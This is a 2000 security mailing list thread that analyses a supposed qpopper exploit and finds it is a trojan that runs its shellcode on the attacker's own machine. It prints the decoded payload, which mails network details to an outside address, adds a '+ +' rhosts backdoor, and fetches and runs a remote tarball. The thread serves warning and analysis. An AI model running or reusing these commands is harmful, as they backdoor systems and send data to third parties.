Re: QPOP2.5* exploit ??

[llmora () S21SEC COM (Lluis Mora)]

> I have yet to totally decode the asm, and don't think I will bother to go
> any further, so it is possible it does more than just this, however it
> quite obviously isn't a straight qpopper exploit. Anyone tried against a
> qpopper install to see if it executes?

If I were you I wouldn't give it a try, as all it does is execute the
shellcode _locally_  (the box trying to run the exploit), not the remote
machine. It's a trojan as has been previously noticed by rpc <h () ckz org>.

(char *)qpop_proc = shellcode; /* Points the qpop_proc function to the
shellcode

[...]

/* Tries an always unsuccessful exploit */

[...]

quit(0); /* Before exiting, it executes quit() */

void quit(int x)
{
     qpop_proc(); /* which contains a call to the shellcode, executed in the
local machine */
     exit(x);
}

Cheers,

Lluis Mora              llmora () s21sec com

-----Mensaje original-----
De: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]En nombre de
phi-vulndev () EXORSUS NET
Enviado el: lunes 15 de mayo de 2000 2:36
Para: VULN-DEV () SECURITYFOCUS COM
Asunto: Re: QPOP2.5* exploit ??

>      this has been found in the wild, however there seems to be a trojan
> in the shellcode.  Popper 2.5* has been thought to be safe.  I would not
> reccomend running this on your own machine unless you crack the
> shellcode and see what it does.

Trivial xor of 2 encoding of part of the shellcode reveals:

/bin/sh -c
/sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null;
echo '+ +' >> ~root/.rhosts;
rcp lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar;
tar -xvf solwar* >> /dev/null;
cd solwar;
chmod +x solwar.sh;
./solwar.sh >> /dev/null;
cd ..;
rm -rf solwar*;

I have yet to totally decode the asm, and don't think I will bother to go
any further, so it is possible it does more than just this, however it
quite obviously isn't a straight qpopper exploit. Anyone tried against a
qpopper install to see if it executes?

Phi.